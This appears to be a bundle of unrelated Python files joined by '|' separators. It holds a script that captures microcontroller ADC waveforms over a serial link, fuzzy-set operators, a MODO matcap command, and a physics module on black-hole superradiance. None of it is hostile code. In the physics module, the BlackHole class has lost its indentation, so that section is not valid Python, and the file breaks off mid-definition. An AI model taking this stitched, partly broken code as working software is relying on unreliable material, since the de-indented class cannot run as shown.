    Namespace-style class: methods take no `self` and are called as
    `config.foo(...)`; mutable state (sample_count, prescalar, adc,
    high_res) lives in class attributes set by the setters below, which
    also push the value to the device via the module-level write_var.
    """
    # device limit: the sample count is stored in a single byte (see
    # _adjust_sample_count for the 0x100 -> 0 encoding)
    MAX_SAMPLE_COUNT = 0x100
    # current-sense shunt resistance (ohms); 1/current_res converts V -> A
    current_res = 0.02
    # voltage-divider ratios on the coil and supply measurement inputs
    vcoil_scale = 2
    vsup_scale = 11
    # indexed by high_res = [0,1]
    Vrefs = [5, 2.56]
    resolutions = [256, 1024]
    # indexed by adc = [0..7]
    scales = [vcoil_scale, vcoil_scale, 0, 0, 0, 0, 1 / current_res, vsup_scale]
    def _adjust_sample_count(v):
        """Validate a requested sample count and encode it for the device."""
        if v > config.MAX_SAMPLE_COUNT:
            raise ValueError("max sample_count is %d, which is less than %d" %
                (config.MAX_SAMPLE_COUNT, v))
        # this is because the "do I make another ADC measurement?" if statement in the
        # device looks like this:
        #   if (--copy_of_sample_count == 0)
        #       stop_adc();
        # so if copy_of_sample_count starts off as zero, it will return as 0xFF and
        # 0x100 samples will actually be taken
        if v == config.MAX_SAMPLE_COUNT:
            v = 0
        return v
    def set_sample_count(v):
        """Set how many ADC samples the device captures per trigger."""
        config.sample_count = config._adjust_sample_count(v)
        write_var('sample_count', config.sample_count)
    def set_prescalar(v):
        """Set the ADC clock prescalar index (see mcu.ADC_PRESCALAR)."""
        config.prescalar = v
        write_var('prescalar', v)
    def set_adc(v):
        """Select which ADC channel the device samples."""
        config.adc = v
        write_var('which_adc', v)
    def set_high_res(v):
        """Select resolution/reference pair (0: 256/5V, 1: 1024/2.56V)."""
        config.high_res = v
        write_var('high_res', v)
    def set_vcoil():
        """Configure for coil-voltage measurement (low res, ADC 0)."""
        config.set_high_res(0)
        config.set_adc(0)
    def set_current():
        """Configure for current measurement (high res, ADC 6)."""
        config.set_high_res(1)
        config.set_adc(6)
    def set_vsup():
        """Configure for supply-voltage measurement (low res, ADC 7)."""
        config.set_high_res(0)
        config.set_adc(7)
    def convert_y():
        """Return a function mapping a raw ADC count to physical units
        using the currently configured resolution, Vref and scale."""
        c = config
        return lambda adc: adc / c.resolutions[c.high_res] * c.Vrefs[c.high_res] * c.scales[c.adc]
    def x_values():
        """Sample timestamps (seconds) for the configured capture."""
        spacing = mcu.adc_sample_time(config.prescalar)
        return [spacing * n for n in range(0, config.sample_count)]
    def trigger():
        # NOTE(review): reading magic address 0xFFF9 appears to start a
        # capture on the device — confirm against the firmware.
        read_var(0xFFF9, 1);
    def get_mcucsr():
        """Read the device's mirrored MCU control & status register."""
        return read_var8('mcucsr_mirror')
    def check_reset_cause():
        """Warn on stderr if the device reports a watchdog or brown-out reset."""
        mcucsr = config.get_mcucsr()
        m = mcu.MCUCSR
        if (mcucsr & (1<<m.WDRF)) != 0:
            print("RESET CAUSE: watchdog timer reset", file=sys.stderr)
        if (mcucsr & (1<<m.BORF)) != 0:
            print("RESET CAUSE: brown out", file=sys.stderr)
def flatten(a):
    """Concatenate an iterable of iterables into one flat list."""
    return [item for sub in a for item in sub]
def data(s):
    """Encode command text as latin1 bytes for the serial port."""
    return s.encode('latin1')
def decode(by):
    """Decode latin1 serial bytes back into text (byte-transparent)."""
    return str(by, 'latin1')
def write(s):
    """Send command string *s*, then a carriage return, over the serial link."""
    ser.write(data(s))
    ser.write(data('\r'))
def get_addr(var_name):
    """Map a firmware variable name to its RAM address (from the .map file,
    parsed by init_ser into `mapped_variables`)."""
    return mapped_variables[var_name]
def check_ack():
    """Consume the '~' acknowledgement byte from the device.

    On mismatch, raises CommunicationsError including whatever the device
    sent instead (plus up to 500 drained bytes for context).
    """
    c = decode(ser.read(1))
    if c != '~':
        raise CommunicationsError("ERROR: did not get ~ as ack: '%s%s'" %
            (c, decode(ser.read(500)).strip()))
def write_var(var, bytes):
    """Write one or more byte values to a device variable over serial.

    Arguments:
        var: firmware variable name (looked up via get_addr) or raw address.
        bytes: a single byte value or a list of byte values.
    """
    addr = get_addr(var) if isinstance(var, str) else var
    # the parameter shadows the builtin `bytes`; bind a fresh local so the
    # body does not rely on the shadowed name
    values = bytes if isinstance(bytes, list) else [bytes]
    cmd = '%04X w %s' % (addr, ' '.join('%02X' % y for y in values))
    write(cmd)
    check_ack()
def read_var8(var):
    """Read a single byte value from a device variable."""
    return read_var(var)[0]
def read_var(var, count=1, binary=True):
    """Read `count` bytes from a device variable (name or raw address).

    In binary mode the device replies with raw bytes; otherwise with
    space-separated hex text terminated by CRLF.  Returns a list of ints.

    Raises:
        CommunicationsError: when fewer bytes than expected arrive.
        ValueError: when the text reply cannot be parsed as hex.
    """
    addr = get_addr(var) if isinstance(var, str) else var
    cmd = '%04X %02X' % (addr, count)
    write(cmd)
    check_ack()
    if binary:
        by = ser.read(count)
        if len(by) < count:
            raise CommunicationsError("Expected %d bytes, got %d: %s" % (count, len(by), by))
        return list(by)
    else:
        # each byte arrives as "XX " plus a trailing CRLF
        expected = count * len('00 ') + len('\r\n')
        by = ser.read(expected)
        s = decode(by.strip())
        if len(by) < expected:
            raise CommunicationsError("Expected %d bytes, got %d: '%s'" % (expected, len(by), s))
        try:
            return [int(str(y), 16) for y in s.split(' ')]
        except ValueError:
            # was a bare `except:`; narrowed so that only the parse failure
            # gets the diagnostic print before re-raising
            print("read_var: %s" % s)
            raise
def get_waveform():
    """Read the captured waveform buffer from the device.

    Reads in chunks of at most serial_twi_bridge.MAX_READ_BYTES bytes
    until config.sample_count bytes have been collected.
    """
    waveform_addr = get_addr('waveform')
    v = []
    chunk = serial_twi_bridge.MAX_READ_BYTES
    for i in range(0, int(ceil(config.sample_count / chunk))):
        # last chunk may be shorter than MAX_READ_BYTES
        v += read_var(waveform_addr, min(chunk, config.sample_count - i * chunk))
        waveform_addr += chunk
    return v
def exec(t):
    """Run a state sequence `t` = [(state_byte, wait_ticks), ...] on the
    device, wait for the capture to finish, and return the ADC waveform.

    NOTE(review): this shadows the builtin `exec`; renaming it would also
    require updating exec_save(), so it is left as-is here.
    """
    # time the capture will take at the current prescalar/sample settings
    expected_delay = mcu.adc_sample_time(config.prescalar) * config.sample_count
    write_var('states', [s for s, w in t])
    # waits are sent little-endian as (low byte, high byte) pairs
    write_var('state_waits', flatten([w & 0xFF, (w & 0xFF00) >> 8] for s, w in t))
    config.trigger()
    time.sleep(expected_delay)
    return get_waveform()
def exec_save(t, file):
    """Run state sequence `t` and save "raw microseconds value" rows to `file`."""
    with open(file, 'w') as f:
        by = exec(t)
        convert_y = config.convert_y()
        x_values = config.x_values()
        for idx, y in enumerate(by):
            # columns: raw ADC count, time in us, converted physical value
            f.write('%d %.3f %.3f\n' % (y, x_values[idx] * 1e6, convert_y(y)))
#ser.read(500)
# sys.exit()
init_ser()
config.check_reset_cause()
# exec_save([(sen,200),(sen+Ap,delta_t),(sen,200)], 'wave')
# exec_save([(Cp+An,delta_t)], 'wave')
# Capture waveforms for every single FET and FET pair, for each of the
# three measurement channels; retry once on a communications error.
for i in range(0,2):
    try:
        fet_on_time = sense_on_time = 800
        config.set_prescalar(6)
        config.set_sample_count(0x30)
        def with_sense(fet, file):
            # sense line held on before/after the FET pulse
            exec_save([
                (sense_common, sense_on_time),
                (sense_common+fet, fet_on_time),
                (sense_common, sense_on_time)], file)
        def without_sense(fets, file):
            exec_save([(0, sense_on_time), (fets, fet_on_time)], file)
        # BUGFIX: the third p-side entry used the Bp mask while being
        # labelled 'Cp'; it must be the Cp mask.
        pFETs = [(Ap, 'Ap'), (Bp, 'Bp'), (Cp, 'Cp')]
        nFETs = [(An, 'An'), (Bn, 'Bn'), (Cn, 'Cn')]
        def rotate(l, n):
            return l[n:] + l[0:n]
        def interleave(l1, l2):
            return flatten([a, b] for a,b in zip(l1, l2))
        def double(n):
            # pair each p-FET with an n-FET of a different phase
            return [(pFET+nFET, '%s-%s' % (pS, nS)) for (pFET,pS),(nFET,nS) in zip(pFETs, rotate(nFETs, n))]
        singles = pFETs + nFETs
        doubles = interleave(double(1), double(2))
        for f, ext in [
            (config.set_vcoil, 'vcoil'),
            (config.set_current, 'current'),
            (config.set_vsup, 'vsup')]:
            f()
            for fet, name in singles:
                with_sense(fet, '%s.%s' % (name, ext))
            for fets, name in doubles:
                without_sense(fets, '%s.%s' % (name, ext))
        break
    except CommunicationsError as ex:
        print("ex: %s" % ex, file=sys.stderr)
        continue
def gnuplot():
    """Print one gnuplot `plot` command per captured FET waveform set.

    The format string is built in two stages: the first `.format(*t)` fills
    in the file extension / legend / axis per trace, while `{{0}}` survives
    as `{0}`; the final `.format(name)` then substitutes the FET name that
    prefixes the data files (and `{{...}}` in the legends collapses to
    gnuplot subscript syntax like `V_{coil}`).
    """
    format_string = "set title '{0}'; plot " + \
        ', '.join(["'{{0}}.{0}' u 2:3 t '{1}' w lp{2}".format(*t) for t in [
            ('vcoil', 'V_{{coil}}', ''),
            ('vsup', 'V_{{battery}}', ''),
            ('current', 'I_{{battery}}', ' axes x1y2')]])
    # `singles` and `doubles` are defined in the non-function code above
    for fet, name in singles + doubles:
        print(format_string.format(name))
|
from alphaOps import AlphaOps
from extention import ExtentionOps
# Global w value for the Yager operators; module-level for simplicity.
w = 2


class Ops():
    """Used to generate the correct fuzzy set operation for each node."""

    def printStuff(self):
        print(dir(self))

    def getFunc(self, operator):
        """Resolve an operator spec ("alpha:x", "extend:x" or a method name)."""
        ops = operator.split(":")
        if ops[0] == "alpha":
            return AlphaOps(ops[1]).alphaCuts
        elif ops[0] == "extend":
            return ExtentionOps(ops[1]).func
        else:
            return getattr(self, ops[0])

    # Zadeh Operators #########################
    def compliment(self, x):
        return 1 - x[0]

    def intersect(self, params):
        return min(*params)

    def union(self, params):
        return max(*params)

    # bounded sum operations ##################
    def bunion(self, params):
        return min(1, sum(params))

    def bintersect(self, params):
        return max(0, (sum(params) - 1))

    # Yager Operations ##########################
    def ycompliment(self, x):
        return (1 - x[0]**w)**(1/w)

    def yunion(self, params):
        """Yager s-norm: min(1, (sum x^w)^(1/w))."""
        if len(params) < 2:
            raise Exception("Must provide at least two params to perform a union")
        return min(1, (sum(x ** w for x in params))**(1/w))

    def yintersect(self, params):
        """Yager t-norm: 1 - min(1, (sum (1-x)^w)^(1/w))."""
        if len(params) < 2:
            raise Exception("Must provide at least two params to perform an intersection")
        # BUGFIX: the original omitted the leading "1 -", returning the
        # complement of the Yager intersection (e.g. yintersect([1, 1])
        # gave 0 instead of 1).
        return 1 - min(1, (sum((1 - x) ** w for x in params))**(1/w))
|
# python
import lx, bling, os, lxu
CMD_NAME = "bling.matcapAdd"
class CommandClass(bling.CommanderClass):
    """Add a matcap shader to the render item and assign the chosen matcap
    image to it (MODO command `bling.matcapAdd`)."""
    _commander_default_values = []
    _icon = None
    _imageCache = bling.imageCache()

    def commander_arguments(self):
        return [
            {
                'name': 'matcap',
                'datatype': 'string',
                'label': 'Matcap',
                'values_list_type': 'popup',
                'values_list': bling.MatcapListPop,
                'flags': ['query']
            }
        ]

    def cmd_IconImage(self, w, h):
        """Return a cached thumbnail for the selected matcap image (or None)."""
        image_path = self.commander_arg_value(0)
        if image_path:
            TN = self._imageCache.GetImageTN(image_path)
            return TN

    def commander_execute(self, msg, flags):
        image = self.commander_arg_value(0)
        MatcapListPop = bling.MatcapListPop()
        scnSel = lxu.select.SceneSelection().current()
        scnSrv = lx.service.Scene()
        render = scnSel.ItemLookup('Render')
        # handle the special popup entries first
        if image == bling.NONE:
            lx.eval("bling.matcapRemove")
            MatcapListPop.setSelected()
        elif image == bling.OPEN_FOLDER:
            lx.eval('file.open {%s}' % bling.matcap_folder())
        elif image == bling.UPDATE:
            lx.eval("bling.matcapRemove")
            MatcapListPop.getMatcapListPop()
            image = MatcapListPop.getSelected()
        if os.path.isfile(image):
            lx.eval("bling.matcapRemove")
            MatcapListPop.setSelected(image)
            matCapObj = scnSel.ItemAdd(scnSrv.ItemTypeLookup('matcapShader'))
            matCapObj.SetName(lx.eval("user.value bling_matcap_item_name ?"))
            parentGraph = scnSel.GraphLookup('parent')
            itemGraph = lx.object.ItemGraph(parentGraph)
            childrenCount = itemGraph.RevCount(render)  # queried but unused
            itemGraph.SetLink(matCapObj, -1, render, -1)
            lx.eval('clip.addStill {%s}' % image)
            lx.eval('item.channel videoStill$colorspace "nuke-default:sRGB"')
            lx.eval('select.item {%s} set' % matCapObj.Ident())
            imageName = os.path.basename(image)
            lx.eval('matcap.image {%s:videoStill001}' % imageName[:imageName.rfind('.')])
            chan = scnSel.Channels('edit', 0.0)
            chnWrite = lx.object.ChannelWrite(chan)
            # BUGFIX: the original `return`ed out of this loop on the first
            # iteration, so only 'glOnly' was ever written, 'gamma' was
            # skipped, and the shading-style switch below never ran.
            for channel in (('glOnly', 1), ('gamma', 1.0)):
                idx = matCapObj.ChannelLookup(channel[0])
                if isinstance(channel[1], int):
                    chnWrite.Integer(matCapObj, idx, channel[1])
                elif isinstance(channel[1], float):
                    chnWrite.Double(matCapObj, idx, channel[1])
        try:
            # Since we currently can not target a GL window, we
            # are wrapping this in a try just in case there is no available
            # GL window, or we are focused on a UV window
            lx.eval('!!view3d.shadingStyle advgl')
        except:
            pass
lx.bless(CommandClass, CMD_NAME)
|
# MIT License
# Copyright (c) 2018 Maximiliano Isi, Richard Brito
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import numpy as np
from scipy.special import factorial
from . import leavers
from .utilities import *
try:
    # if LAL is available, import constants for better accuracy (?)
    from lal import C_SI, G_SI, HBAR_SI, PC_SI, MSUN_SI, DAYSID_SI, YRSID_SI
except ImportError:
    # SI fallbacks when LAL is not installed
    G_SI = 6.674e-11 # m^3 kg^-1 ss^-2
    C_SI = 299792458 # m ss^-1
    HBAR_SI = 1.054571e-34 # kg m^2 ss^-2*ss
    PC_SI = 3.08567758e16 # m
    MSUN_SI = 1.9891e30 # kg
    # BUGFIX: these two were missing from the fallback even though they
    # are imported from lal above and used by tinst_approx/tgw_approx,
    # causing a NameError whenever LAL was absent.
    DAYSID_SI = 86164.09053083288 # sidereal day, s
    YRSID_SI = 31558149.763545603 # sidereal year, s
EV_SI = 1.602176565e-19 # kg (m ss^-1)^2
MPL_SI = np.sqrt(HBAR_SI * C_SI / G_SI)
# ###########################################################################
# FUNCTIONS
def get_gw(alpha, lgw=2, l=1, m=1, nr=0, distance=1, times=False, **kwargs):
    """ Get amplitude and frequency of GW emission for given alpha, and BH properties
    determined by kwargs.

    Returns [h0, fgw], extended with the cloud's growth time and life time
    when `times` is true.
    """
    cloud = BosonCloud.from_parameters(l, m, nr, alpha=alpha, **kwargs)
    output = [cloud.gw(lgw).h0r/distance, cloud.gw(lgw).f]
    if times:
        output.extend([cloud.number_growth_time,
                       cloud.get_life_time(lgws=[lgw])])
    return output
def get_alpha_max(chi, m=1):
    """Maximum superradiant alpha: m times the dimensionless horizon
    frequency — see Eq. (7) in the paper."""
    rp_natural = 1 + np.sqrt(1 - chi**2)
    return 0.5*m*chi/rp_natural
def get_final_spin(alpha, m=1):
    """Black-hole spin at which superradiance for mode `m` saturates."""
    numerator = 4.*alpha*m
    return numerator / (4.*alpha**2 + m**2)
def qcd_axion_mass(fa):
    '''Mass of QCD axion as a function of symmetry breaking scale.
    See e.g. Eq. (2) in [arXiv:1004.3558]
    Arguments
    ---------
    fa: float
        Peccei-Quinn axion symmetry breaking scale in eV.
    Returns
    -------
    mua: float
        QCD axion mass in eV.
    '''
    reference_scale = 1e16 * 1e9  # 10^25 eV
    return 6e-10 * (reference_scale / fa)
def hydrogenic_level(n, alpha):
    ''' Return hydrogenic levels: (En / E0)
    Arguments
    ---------
    n: float
        *principal* quantum number `n = nr + l + 1`, for `nr` the radial
        and `l` the azimuthal quantum numbers.
    alpha: float
        Fine-structure constant.
    Returns
    -------
    level: float
        dimensionless level (En / E0).
    '''
    ratio = alpha/n
    return 1 - 0.5 * ratio**2
# TODO: make these static methods of BlackHoleBoson?
def h0_scalar_brito(m_i, alpha, chi_i=0.9, d=1, l=1, m=1, lgw=None, mgw=None,
                    msun=True):
    """GW strain for scalar boson from Brito et al. [PhysRevD.96.064050]
    Default GW emission at (lgw=2*l, mgw=2*m).
    Arguments
    ---------
    m_i: float, array
        initial black-hole mass (in solar masses if `msun`, else kg).
    alpha: float, array
        fine-structure constant.
    chi_i: float, array
        initial black-hole spin parameter (dimensionless).
    d: float, array
        distance to source in meters (def. 1).
    l, m: int
        boson-cloud mode numbers.
    lgw, mgw: int
        GW emission mode; default (2*l, 2*m).
    msun: bool
        expect black-hole mass in solar masses.
    Returns
    -------
    h0: float, array
        gravitational-wave amplitude (strain).
    fgw:
        gravitational-wave frequency (Hz).
    """
    # dimensionless boson frequency for (l=1, m=1, nr=0)
    # same as `alpha*hydrogenic_level(1+1, alpha)` (see above)
    mwr = alpha*hydrogenic_level(l + 1, alpha)
    # dimensionless gravitational wave frequency
    mwgw = 2*mwr
    # black-hole final dimensionless spin, from Eq. (25)
    chi_f = 4*mwr/(1 + 4*mwr**2)
    # black-hole final mass, from Eq. (26)
    m_i = m_i*MSUN_SI if msun else m_i
    m_f = m_i*(1 - mwr*(chi_i - chi_f))
    m_c = m_i - m_f
    # dimensionfull GW frequency (rescaling `mwgw` by final BH mass)
    fgw = C_SI**3 * mwgw / (2*np.pi*G_SI*m_f)
    # numerical fit to GW emitted power for (lgw=2, mgw=2)
    # NOTE(review): `Zabs` is defined elsewhere in this module — confirm
    # its fast_fit signature if calling this in isolation.
    zabs = Zabs.fast_fit(alpha, lgw=lgw or 2*l, mgw=mgw or 2*m)
    # Eq. (39) in Brito et al. with units restored
    h0 = G_SI*2*zabs*m_c / (d * C_SI**2 * mwgw**2)
    return h0, fgw
def h0_scalar_approx(alpha, f=None, m_bh=None, m_b=None, d=1,
                     msun=True, ev=True, chi=None):
    """ Analytic approximation to the peak BHB scalar strain from Arvanitaki+.
    Arguments
    ---------
    alpha: float
        gravitational fine-structure constant.
    f: float
        signal frequency
    m_bh: float
        black-hole mass (solar masses if `msun`) [opt].
    m_b: float
        boson mass (eV if `ev`) [opt].
    d: float
        distance to source (def. 1).
    chi: float
        if given, the strain is rescaled by the spin correction
        (chi - final spin)/0.1.
    Returns (h0, f).
    """
    if f is not None:
        # `f_gw = 2*f_boson` implies:
        # NOTE(review): HBAR_SI*pi*f is an energy in joules, yet ev=True
        # makes Alpha interpret m_b in eV — confirm the intended units.
        m_b = HBAR_SI*np.pi*f
        ev = True
    a = Alpha(alpha=alpha, m_bh=m_bh, m_b=m_b, msun=msun, ev=ev)
    if f is None:
        f = a.fgw
    h0 = 1E-24 * (a.alpha/0.1)**8 * (PC_SI*1E3/d) * (1E-12/a.m_b_ev)
    if chi is not None:
        # add spin correction
        h0 *= (chi - get_final_spin(a.alpha)) / 0.1
    return h0, f
def h0_vector_approx(alpha, f=None, m_bh=None, m_b=None, d=PC_SI*1E3,
                     msun=True, ev=True):
    """ Analytic approximation to the peak BHB vector strain from Arvanitaki+.
    Arguments
    ---------
    alpha: float
        gravitational fine-structure constant.
    f: float
        signal frequency
    m_bh: float
        black-hole mass (solar masses if `msun`) [opt].
    m_b: float
        boson mass (eV if `ev`) [opt].
    d: float
        distance to source in meters (def. 1 kpc).
    Returns (h0, f).
    """
    if f is not None:
        # `f_gw = 2*f_boson` implies:
        # NOTE(review): same unit question as h0_scalar_approx — this is
        # an energy in joules handed to Alpha as if it were eV; confirm.
        m_b = HBAR_SI*np.pi*f
        ev = True
    a = Alpha(alpha=alpha, m_bh=m_bh, m_b=m_b, msun=msun, ev=ev)
    if f is None:
        f = a.m_b_ev / (HBAR_SI*np.pi)
    h0 = 5E-21 * (a.alpha/0.1)**6 * (PC_SI*1E3/d) * (1E-12/a.m_b_ev)
    return h0, f
def tinst_approx(m, alpha, chi, msun=True):
    """Approximate superradiant instability (growth) timescale in seconds.

    NOTE(review): `m *= MSUN_SI` rebinds a scalar, but would mutate a numpy
    array argument in place — confirm callers only pass scalars.
    """
    if msun:
        m *= MSUN_SI
    return 27. * DAYSID_SI * (m/(10*MSUN_SI)) * (0.1/alpha)**9 / chi
def tgw_approx(m, alpha, chi, msun=True):
    """Approximate GW emission (cloud depletion) timescale in seconds."""
    if msun:
        m *= MSUN_SI
    return (6.5E4) * YRSID_SI * (m/(10*MSUN_SI)) * (0.1/alpha)**15 / chi
# TODO make these Cloud methods?
def get_sr_cond(x, jx, T0, epsilon, m=1):
    """Superradiance condition expression for mode `m` (sign carries the test)."""
    correction = x**2 * (m*x - jx) * 4*T0**2/(m*epsilon)**2
    return jx - correction
def Z22fit(a):
    """Piecewise polynomial fit of the (2,2) GW emission factor vs alpha."""
    if a <= 0.20:
        return 0.7904787874157165*a**8 - 3.7424860251567065*a**9 + 8.014109763942045*a**10
    if a <= 0.32:
        return 0.004916101490720274*a - 0.03147120978236612*a**2 + 0.08775988014052985*a**3 - 0.08822040008857081*a**4 - 0.0002843701901412038
    if a <= 0.39:
        return 0.030448009925872987*a - 0.15871207790615727*a**2 + 0.3678694551762226*a**3 - 0.31822691778030665*a**4 - 0.002191953405332143
    return 57.61596540418577 - 799.870254999872*a + 4621.284921350437*a**2 - 14222.17764949403*a**3 + 24588.66580766965*a**4 - 22642.55327085838*a**5 + 8675.73911658002*a**6


# vectorized variant for array-valued alpha
Z22fitvec = np.vectorize(Z22fit)
# ###########################################################################
# CLASSES
class BlackHole(object):
def __init__(self, mass, chi=None, a=None, j=None, msun=False):
""" Black hole of given mass and spin.
Can pass spin using the dimensionless parameter `chi`, or the
Kerr parameter (dimensions of length) `a`, or the angular momentum
itself, `j`.
Defaults to no spin (`chi=0`) and fails if more than one spin
parameters are provided.
Arguments
---------
mass: float
mass in kg (or in MSUN, if `msun` is True).
chi: float
dimensionless spin, `chi = (c^2/G)(a/M)`, in (0, 1) [opt].
a: float
Kerr parameter, `a = J/(Mc)`, in meters [opt].
j: float
black-hole angular momentum, `J`, in SI units [opt].
msun: bool
whether `mass` is given in solar masses (def. False).
"""
# MASS
if msun:
self.mass = mass * MSUN_SI
self.mass_msun = mass
mass = self.mass
else:
self.mass = mass
self.mass_msun = mass / MSUN_SI
# LENGTHSCALE
self.rg = G_SI * mass / C_SI**2
self.rs = 2 * self.rg
# TIMESCALE
self.tg = self.rg / C_SI
# SPIN
if sum([int(spin_param is None) for spin_param in [chi, a, j]]) < 2:
raise ValueError("can only take one spin parameter: chi, a, or J.")
elif a is not None:
chi = a / self.rg
elif j is not None:
chi = j / (self.mass * C_SI * self.rg)
elif chi is None:
# no spin provided, default to Schwarzschild
chi = 0
self.chi = chi
self.a = self.rg * self.chi
self.angular_momentum = self.mass * C_SI * self.a
# RADII in natural units (G=M=c=1)
self.rp_natural = 1 + np.sqrt(1 - self.chi**2)
self.rm_natural = 1 - np.sqrt(1 - self.chi**2)
self.rp = self.rg * self.rp_natural
self.rm = self.rg * self.rm_natural
# ANGULAR VELOCITY
self.omega_horizon_natural = chi / (2. * self.rp_natural)
self.omega_horizon = chi * C_SI / (2. * self.rp) # = oh_nat * c / rg
# AREA
self.area = 4*np.pi*(self.rp**2 + self.a**2)
self.area_natural = 8 * np.pi * self.rp_natural
# SR-SPECIFIC
self._h0r_fits = {}
def sigma(self, r, theta):
""" Kerr auxiliary length Sigma, function of radius and polar angle
in Boyer Lindquist coordinates.
Arguments
---------
r : float
BL radius (m)
theta : float
BL polar angle (rad).
Returns
-------
sigma : float
sigma (m).
"""
return r**2 + self.a**2 * np.cos(theta)**2
def delta(self, r):
""" Kerr auxiliary length Delta, function of radius
in Boyer Lindquist coordinates.
Arguments
---------
r : float
BL radius (m)
Returns
-------
delta : float
delta (m).
"""
return r**2 - self.rs * r + self.a**2
def omega(self, r, theta):
""" Frame dragging angular frequency (rad) for Boyer-Lindquist radius
and polar angle.
"""
num = C_SI * self.rs * r * self.a
den = self.sigma(r, theta)*(r**2 + self.a**2) + \
self.rs * r * self.a**2 * np.sin(theta)**2
omega = num / den
return omega
def ergoshphere(self, theta, natural=False):
"""Innner and outer ergosphere radii for given polar angle.
"""
if natural:
rs = 2
a = self.chi
else:
rs = self.rs
a = self.a
rEp = 0.5 * (rs + np.sqrt(rs**2 - 4* a**2 * np.cos(theta)**2))
rEm = 0.5 * (rs - np.sqrt(rs**2 - 4* a**2 * np.cos(theta)**2))
return rEp, rEm
# --------------------------------------------------------------------
# UTILITIES
def scan_alphas(self, l=1, m=1, nr=0, delta_alpha=0.001, alpha_min=0.001,
alpha_max=None, lgw=None, verbose=False, ncpus=1, **kwargs):
alpha_max = alpha_max or get_alpha_max(self.chi, m=m)
alphas = np.arange(alpha_min, alpha_max, delta_alpha)
h0rs, fgws = [], []
iterable = alphas
# determine whether to show progress bar
if verbose:
try:
from tqdm import tqdm
iterable = tqdm(alphas)
except ImportError:
print("WARNING: need tqdm for verbosity.")
# iterate
for alpha in iterable:
cloud = BosonCloud.from_parameters(l, m, nr, m_bh=self.mass_msun,
chi_bh=self.chi, alpha=alpha,
**kwargs)
h0rs.append(cloud.gw(lgw).h0r)
fgws.append(cloud.gw(lgw).f)
return np.array(h0rs), np.array(fgws), alphas
def best_alpha(self, *args, **kwargs):
h0rs, fgws, alphas = self.scan_alphas(*args, **kwargs)
h0r_max = h0rs.max()
i_max = np.where(h0rs==h0r_max)[0][0]
return h0r_max, fgws[i_max], alphas[i_max]
# NOTE: currently, this is essentially just refitting Zabs, which is a bit
# dumb... however, the total mass of the cloud is also used, which might
# be computed numerically in the future to make the code more precise---so
# leave this as is.
def h0r_fit(self, f, **kwargs):
l = int(kwargs.pop('l', 1))
m = int(kwargs.pop('m', 1))
lgw = int(kwargs.pop('lgw', 2*l))
if (l, m, lgw) not in self._h0r_fits:
from scipy.interpolate import interp1d
h0rs, fgws, _ = self.scan_alphas(l=l, m=m, lgw=lgw, **kwargs)
self._h0r_fits[(l, m, lgw)] = interp1d(fgws, h0rs, fill_value=0,
bounds_error=False)
return self._h0r_fits[(l, m, lgw)](f)
    def fgw(self, alpha=None, l=1, nr=0, m_b=None, ev=True):
        """GW frequency for this BH's (l, nr) level, applying the hydrogenic
        binding-energy correction for principal number `l + nr + 1`.
        """
        a = Alpha(m_bh=self.mass_msun, alpha=alpha, m_b=m_b, ev=ev)
        level_correction = hydrogenic_level(l+nr+1, a.alpha)
        return level_correction * a.fgw
class Boson(object):
    def __init__(self, mass, spin=0, ev=False):
        """ A boson field of given mass and spin.
        Arguments
        ---------
        mass: float
            mass in kg (or in eV, if `ev`).
        spin: int
            spin-weight (0, 1, 2).
        ev: bool
            mass provided in eV.
        """
        if ev:
            # `mass` is really an energy in eV: convert down to kg
            self.energy_ev = mass
            self.energy = mass * EV_SI
            mass = self.energy / C_SI**2
            self.mass = mass
        else:
            self.mass = mass
            self.energy = mass * C_SI**2
            self.energy_ev = self.energy / EV_SI
        self.spin = spin
        # angular frequency of the field
        self.omega = self.energy / HBAR_SI
        # Compton wavelengths
        self.reduced_compton_wavelength = HBAR_SI / (mass * C_SI)
        self.compton_wavelength = 2 * np.pi * self.reduced_compton_wavelength
        # `mu` mass parameter in Brito et al.'s convention
        self.mu_brito = C_SI * self.mass / HBAR_SI
class Alpha(object):
    def __init__(self, m_bh=None, m_b=None, alpha=None, msun=True, ev=True,
                 tolerance=1E-10):
        """ Gravitational fine-structure constant.
        Initialize with any two of (m_bh, m_b, alpha) to derive the third;
        if all three are given, they are checked for consistency (raising
        `ValueError` on mismatch).
        Arguments
        ---------
        m_bh: float
            black-hole mass (in MSUN, or SI if `msun` is False).
        m_b: float
            boson rest mass (eV, or SI if `ev` is False).
        alpha: float
            gravitational fine-structure constant (dimensionless).
        msun: bool
            BH mass provided in solar masses, rather than SI (def True).
        ev: bool
            boson mass provided in eV, rather than SI (def True).
        tolerance: float
            maximum allowed |alpha - G M m / (hbar c)| when all three
            parameters are given (def. 1E-10).
        """
        # normalize both masses to SI
        if msun and m_bh is not None:
            m_bh = MSUN_SI * m_bh
        if ev and m_b is not None:
            m_b = m_b * EV_SI / C_SI**2
        self.m_bh = m_bh
        self.m_b = m_b
        have_bh, have_b, have_alpha = (m_bh is not None, m_b is not None,
                                       alpha is not None)
        if have_bh and have_b and have_alpha:
            # everything given: just verify consistency
            if abs(alpha - self.compute(self.m_bh, self.m_b)) > tolerance:
                raise ValueError("alpha incompatible with BH & boson masses.")
        elif have_bh and have_alpha:
            # derive the boson mass
            self.m_b = HBAR_SI * C_SI * alpha / (G_SI * self.m_bh)
        elif have_b and have_alpha:
            # derive the BH mass
            self.m_bh = HBAR_SI * C_SI * alpha / (G_SI * self.m_b)
        self.alpha = self.compute(self.m_bh, self.m_b) if alpha is None else alpha
    @cached_property
    def m_bh_msun(self):
        """ BH mass in solar masses. """
        return self.m_bh / MSUN_SI
    @cached_property
    def m_b_ev(self):
